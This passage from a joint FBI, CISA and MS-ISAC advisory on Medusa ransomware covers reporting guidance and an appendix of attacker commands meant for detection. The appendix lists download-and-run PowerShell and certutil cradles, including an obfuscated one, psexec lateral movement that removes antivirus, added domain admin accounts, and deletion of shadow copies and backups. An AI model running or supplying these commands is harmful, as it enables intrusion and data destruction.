of comprehensive performance data. Tune your security program, including people, processes, and technologies, based on the data generated by this process. The FBI, CISA, and MS-ISAC recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory. Resources Joint #StopRansomware Guide. Joint Guide Identifying and Mitigating Living Off the Land Techniques. Joint Guide to Securing Remote Access Software. Reporting Your organization has no obligation to respond or provide information back to FBI in response to this joint advisory. If, after reviewing the information provided, your organization decides to provide information to FBI, reporting must be consistent with applicable state and federal laws. FBI is interested in any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with threat actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file. Additional details of interest include a targeted company point of contact, status and scope of infection, estimated loss, operational impact, transaction IDs, date of infection, date detected, initial attack vector, and host- and network-based indicators. The FBI, CISA, and MS-ISAC do not encourage paying ransoms as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, FBI, CISA, and MS-ISAC urge you to promptly report ransomware incidents to FBI’s Internet Crime Complaint Center (IC3), a local FBI Field Office, or CISA via the agency’s Incident Reporting System or its 24/7 Operations Center (report@cisa.gov) or by calling 1-844-Say-CISA (1-844-729-2472). Disclaimer The information in this report is being provided “as is” for informational purposes only. The FBI, CISA, and MS-ISAC do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by the FBI, CISA, and MS-ISAC. Acknowledgements ConnectWise contributed to this advisory. Version History March 12, 2025: Initial version. Appendix A: Medusa Commands These commands explicitly demonstrate the methods used by Medusa threat actors once they obtain a foothold inside a victim network. Incident responders and threat hunters can use this information to detect malicious activity. System administrators can use this information to design allowlist/denylist policies or other protective mechanisms. cmd.exe /c certutil -f urlcache https:///.css .dll cmd.exe /c certutil -f urlcache https:///.msi .msi cmd.exe /c driverquery cmd.exe /c echo Computer: %COMPUTERNAME% & ` echo Username: %USERNAME% & ` echo Domain: %USERDOMAIN% & ` echo Logon Server: %LOGONSERVER% & ` echo DNS Domain: %USERDNSDOMAIN% & ` echo User Profile: %USERPROFILE% & echo ` System Root: %SYSTEMROOT% cmd.exe /c ipconfig /all [T1016] cmd.exe /c net share [T1135] cmd.exe /c net use cmd.exe /c netstat -a cmd.exe /c sc query cmd.exe /c schtasks cmd.exe /c systeminfo [T1082] cmd.exe /c ver cmd.exe /c wmic printer get caption,name,deviceid,drivername,portname cmd.exe /c wmic printjob mmc.exe compmgmt.msc /computer:{hostname/ip} mstsc.exe /v:{hostname/ip} mstsc.exe /v:{hostname/ip} /u:{user} /p:{pass} powershell -exec bypass -enc powershell -nop -c $x = 'D' + 'Own' + 'LOa' + 'DfI' + 'le'; Invoke-Expression (New-Object Net.WebClient).$x.Invoke(http:///.msi) powershell -nop -w hidden -noni -ep bypass &([scriptblock]::create(( New-Object System.IO.StreamReader( New-Object System.IO.Compression.GzipStream(( New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String( (('')-f'', '','')))), [System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd())) powershell Remove-Item (Get-PSReadlineOption).HistorySavePath powershell Get-ADComputer -Filter * -Property * | Select-Object Name,OperatingSystem,OperatingSystemVersion,Description,LastLogonDate, logonCount,whenChanged,whenCreated,ipv4Address | Export-CSV -Path -NoTypeInformation -Encoding UTF8 psexec.exe -accepteula -nobanner -s \\{hostname/ip} "c:\windows\system32\taskkill.exe" /f /im WRSA.exe psexec.exe -accepteula -nobanner -s \\{hostname/ip} -c coba.bat psexec.exe -accepteula -nobanner -s \\{hostname/ip} -c openrdp.bat psexec.exe -accepteula -nobanner -s \\{hostname/ip} -c StopAllProcess.bat psexec.exe -accepteula -nobanner -s \\{hostname/ip} -c zam.bat psexec.exe -accepteula -nobanner -s \\{hostname/ip} c:\temp\x.bat psexec.exe -accepteula -nobanner -s \\{hostname/ip} cmd psexec.exe -accepteula -nobanner -s \\{hostname/ip} cmd /c "c:\gaze.exe" psexec.exe -accepteula -nobanner -s \\{hostname/ip} cmd /c "copy \\ad02\sysvol\gaze.exe c:\gaze.exe psexec.exe -accepteula -nobanner -s \\{hostname/ip} cmd /c "copy \\ad02\sysvol\gaze.exe c:\gaze.exe && c:\gaze.exe" psexec.exe -accepteula -nobanner -s \\{hostname/ip} -u {user} -p {pass} -c coba.bat psexec.exe -accepteula -nobanner -s \\{hostname/ip} -u {user} -p {pass} -c hostname/ipwho.bat psexec.exe -accepteula -nobanner -s \\{hostname/ip} -u {user} -p {pass} -c openrdp.bat psexec.exe -accepteula -nobanner -s \\{hostname/ip} -u {user} -p {pass} -c zam.bat psexec.exe -accepteula -nobanner -s \\{hostname/ip} -u {user} -p {pass} cmd psexec.exe -accepteula -nobanner -s \\{hostname/ip} -u {user} -p {pass} -с newuser.bat psexec.exe -accepteula -nobanner -s \\{hostname/ip} -с duooff.bat psexec.exe -accepteula -nobanner -s \\{hostname/ip} -с hostname/ipwho.bat psexec.exe -accepteula -nobanner -s \\{hostname/ip} -с newuser.bat psexec.exe -accepteula -nobanner -s \\{hostname/ip} -с removesophos.bat psexec.exe -accepteula -nobanner -s \\{hostname/ip} -с start.bat psexec.exe -accepteula -nobanner -s \\{hostname/ip} -с uninstallSophos.bat nltest /dclist: net group "domain admins" /domain [T1069.002] net group "Domain Admins" default /add /domain net group "Enterprise Admins" default /add /domain net group "Remote Desktop Users" default /add /domain net group "Group Policy Creator Owners" default /add /domain net group "Schema Admins" default /add /domain net group "domain users" /domain net user default /active:yes /domain net user /add default /domain [T1136.002] query user reg add HKLM\System\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /t REG_DWORD /d 0 systeminfo vssadmin.exe Delete Shadows /all /quiet vssadmin.exe resize shadowstorage /for=%s /on=%s /maxsize=unbounded del /s /f /q %s*.VHD %s*.bac %s*.bak %s*.wbcat %s*.bkf %sBac kup*.* %sbackup*.* %s*.set %s*.win %s*.dsk netsh advfirewall firewall add rule name="rdp" dir=in protocol=tcp localport=3389 action=allow netsh advfirewall firewall set rule group="windows management instrumentation (wmi)" new enable=yes reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f